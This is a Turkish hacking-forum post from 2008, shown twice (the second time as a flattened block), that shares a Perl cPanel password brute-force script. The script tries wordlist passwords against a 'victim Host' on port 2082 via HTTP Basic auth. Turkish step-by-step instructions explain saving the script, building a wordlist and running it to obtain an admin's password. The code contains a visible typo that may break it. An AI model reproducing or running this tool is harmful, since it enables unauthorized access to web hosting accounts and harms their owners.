Cpanel Password Brute Force TooL ( perL expLoiT )

**DArKNESS®** · 01-30-2008

Kod:

#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
# (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# [ÜYE OLMADAN LİNKLERİ GÖREMEZSİNİZ. BURAYA TIKLAYARAK BEDAVA ÜYE OLUN...]

use IO::Socket;
use LWP::Simple;
use MIME::Base64;

$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
################################################## #############
# usage : cpanel.pl [HOST] [User] [PORT]
[File] #
#-------------------------------------------------------------#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#
: File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
################################################## #############
# (c)oded By Hessam-x / simorgh-ev.com #
################################################## #############
);exit;}

headx();

$numstart = "-1";

sub headx() {
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
# (c)oded By Hessam-x / simorgh-ev.com #
################################################## #############
);
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
print "
[~] Try Password : $passwd
";
&brut;
};
}
sub brut() {
$authx = encode_base64($user.":".$passwd);
print $authx;
my $sock = IO::Socket:NET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "
[-] Can not connect to the host";
print $sock "GET / HTTP/1.1
";
print $sock "Authorization: Basic $authx
";
print $sock "Connection: Close

";
read $sock, $answer, 128;
close($sock);

if ($answer =~ /Moved/) {
print "
[~] PASSWORD FOUND : $passwd
";
exit();
}
}

GErÇekten Perl dilinde yazıLmışh Cok GuzeL bir expLoit ARkAdasLar Brute Force yaparak admin şifresini bulmanızı sağLıor taBi eLinizde SağLam bir WordListiniz oLmalı....

Nese ben exploitten biraz bahsedeyim arkadaslar exploit derlemeyi biliorsunuzdur umarım
bilmeyenler için
öNceLikLe exploit KoduMuzu kOpyaLıoruz ve not defterine yapıstırıorus sonrasında exploitimize bir isim verelim ben "cp" ismini verdim

ve cp.pl seklinde kaydedioruz..uzantısı "pl" olucak buna dikkat edelim cunqi perl dilinde yazıLmısh 1 exploit...
sonrasında exploitimizi C:\Perl\bin'klasörünün içerisine kaydedioruz..Daha sonra saĞlam bir w0rd LiSt oLuştuRuoruz we onuda aynı $ekhiLde..C:\Perl\bin' klasörünün içHeriSine KaydediRuz..
we Ms-Dos'a gelioruz..

C:\********s and Settings\Administrator>cd..

C:\********s and Settings\Administrator>cd..

C:\>cd perl

C:\Perl>cd bin

C:\Perl\bin>perl cp.pl

[ÜYE OLMADAN LİNKLERİ GÖREMEZSİNİZ. BURAYA TIKLAYARAK BEDAVA ÜYE OLUN...]

yukarıda gördugunuz gibi exploitimizi çalıştırdıgımız zmn bize nasıl kullanıcıgımızı gösterior...yhani.. toplarlamak gerekirse..

C:\Perl\bin>perl cp.pl [ÜYE OLMADAN LİNKLERİ GÖREMEZSİNİZ. BURAYA TIKLAYARAK BEDAVA ÜYE OLUN...] adminnicki 2082 wordlistimiz.txt password.txt

yaptıgımızda hazırlamı$h oLduĞumuz wordListimiz dEwReyE giRiy0r sırasıyla wordListteki tüm $ifreLeri denior..
adminin nickine barak password.txt'deki admin şifresi ile word Listimizdeki şifreLeri SıRaSıyLa karsılastırıor..egerki adminin şifresi word LiStiMizde yer almaktaysa ne mutlu bize....
o yuzden arkadasLar sağLam bir word Liste ihtiyaCıNız var..

01-30-2008	#1
DArKNESS® Özel Üye Türkiyenin En Kaliteli Bilgi Paylasim Mekani AKdenizForum.. Kullanıcı Bilgileri Üyelik Tarihi: Aug 2007 Mesajlar: 4.493 Üye No: 25971 Extra Bilgiler Tecrübe Puanı: 29 Rep Gücü : 75 Rep Derecesi : İletişim	Cpanel Password Brute Force TooL ( perL expLoiT ) Kod: #!/usr/bin/perl # Cpanel Password Brute Forcer # ---------------------------- # (c)oded By Hessam-x # Perl Version ( low speed ) # Oerginal Advisory : # [ÜYE OLMADAN LİNKLERİ GÖREMEZSİNİZ. BURAYA TIKLAYARAK BEDAVA ÜYE OLUN...] use IO::Socket; use LWP::Simple; use MIME::Base64; $host = $ARGV[0]; $user = $ARGV[1]; $port = $ARGV[2]; $list = $ARGV[3]; $file = $ARGV[4]; $url = "http://".$host.":".$port; if(@ARGV < 3){ print q( ################################################## ############# # Cpanel Password Brute Force Tool # ################################################## ############# # usage : cpanel.pl [HOST] [User] [PORT] [File] # #-------------------------------------------------------------# # [Host] : victim Host (simorgh-ev.com) # # [User] : User Name (demo) # # [PORT] : Port of Cpanel (2082) # # : File Of password list (list.txt) # # [File] : file for save password (password.txt) # # # ################################################## ############# # (c)oded By Hessam-x / simorgh-ev.com # ################################################## ############# );exit;} headx(); $numstart = "-1"; sub headx() { print q( ################################################## ############# # Cpanel Password Brute Force Tool # # (c)oded By Hessam-x / simorgh-ev.com # ################################################## ############# ); open (PASSFILE, "<$list") \|\| die "[-] Can't open the List of password file !"; @PASSWORDS = <PASSFILE>; close PASSFILE; foreach my $P (@PASSWORDS) { chomp $P; $passwd = $P; print " [~] Try Password : $passwd "; &brut; }; } sub brut() { $authx = encode_base64($user.":".$passwd); print $authx; my $sock = IO::Socket:NET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") \|\| print " [-] Can not connect to the host"; print $sock "GET / HTTP/1.1 "; print $sock "Authorization: Basic $authx "; print $sock "Connection: Close "; read $sock, $answer, 128; close($sock); if ($answer =~ /Moved/) { print " [~] PASSWORD FOUND : $passwd "; exit(); } } GErÇekten Perl dilinde yazıLmışh Cok GuzeL bir expLoit ARkAdasLar Brute Force yaparak admin şifresini bulmanızı sağLıor taBi eLinizde SağLam bir WordListiniz oLmalı.... Nese ben exploitten biraz bahsedeyim arkadaslar exploit derlemeyi biliorsunuzdur umarım bilmeyenler için öNceLikLe exploit KoduMuzu kOpyaLıoruz ve not defterine yapıstırıorus sonrasında exploitimize bir isim verelim ben "cp" ismini verdim ve cp.pl seklinde kaydedioruz..uzantısı "pl" olucak buna dikkat edelim cunqi perl dilinde yazıLmısh 1 exploit... sonrasında exploitimizi C:\Perl\bin'klasörünün içerisine kaydedioruz..Daha sonra saĞlam bir w0rd LiSt oLuştuRuoruz we onuda aynı $ekhiLde..C:\Perl\bin' klasörünün içHeriSine KaydediRuz.. we Ms-Dos'a gelioruz.. C:\******s and Settings\Administrator>cd.. C:\****s and Settings\Administrator>cd.. C:\>cd perl C:\Perl>cd bin C:\Perl\bin>perl cp.pl [ÜYE OLMADAN LİNKLERİ GÖREMEZSİNİZ. BURAYA TIKLAYARAK BEDAVA ÜYE OLUN...] yukarıda gördugunuz gibi exploitimizi çalıştırdıgımız zmn bize nasıl kullanıcıgımızı gösterior...yhani.. toplarlamak gerekirse.. C:\Perl\bin>perl cp.pl [ÜYE OLMADAN LİNKLERİ GÖREMEZSİNİZ. BURAYA TIKLAYARAK BEDAVA ÜYE OLUN...] adminnicki 2082 wordlistimiz.txt password.txt yaptıgımızda hazırlamı$h oLduĞumuz wordListimiz dEwReyE giRiy0r sırasıyla wordListteki tüm $ifreLeri denior.. adminin nickine barak password.txt'deki admin şifresi ile word Listimizdeki şifreLeri SıRaSıyLa karsılastırıor..egerki adminin şifresi word LiStiMizde yer almaktaysa ne mutlu bize.... o yuzden arkadasLar sağLam bir word Liste ihtiyaCıNız var.. AkdenizForum Toolbar Sitemizi Daha İyi Kullanmak İstiyorsanız Daha Kolaylıkla Sizde İndirin [ÜYE OLMADAN LİNKLERİ GÖREMEZSİNİZ. BURAYA TIKLAYARAK BEDAVA ÜYE OLUN...]**

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder